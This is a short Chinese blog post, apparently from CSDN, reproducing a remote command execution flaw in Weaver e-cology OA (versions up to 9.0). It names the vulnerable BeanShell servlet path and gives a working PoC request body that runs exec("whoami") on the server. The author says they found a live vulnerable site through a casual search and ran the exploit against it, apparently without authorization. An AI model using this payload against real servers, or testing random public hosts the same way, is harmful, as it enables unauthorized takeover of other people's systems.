记一次对泛微OA命令执行复现

最近圈子也是被泛微OA命令执行刷爆了。周一上班划水ing,想着来复现一下,顺便更新下博客。运气好随便搜索了一个就存在漏洞

0x01漏洞描述

泛微OA办公系统是一款协调办公软件。

泛微协同商务软件系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器权限。

0x02漏洞危害

攻击者可以通过精心构造的请求包在受影响版本的泛微OA上进行远程代码执行。

0x03影响范围

泛微 e-cology<=9.0

0x04漏洞复现

漏洞路径: /weaver/bsh.servlet.BshServlet

poc:bsh.script=exec("whoami");&bsh.servlet.captureOutErr=true& bsh.servlet.output=raw&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw

访问该站域名加上漏洞路径如果存在,就有漏洞 

 访问后显示这样,点击按钮提交,神器burp抓包。将post内容替换先前的poc

bsh.script=exec("whoami");&bsh.servlet.captureOutErr=true& bsh.servlet.output=raw&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw

发送

成功复现 

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值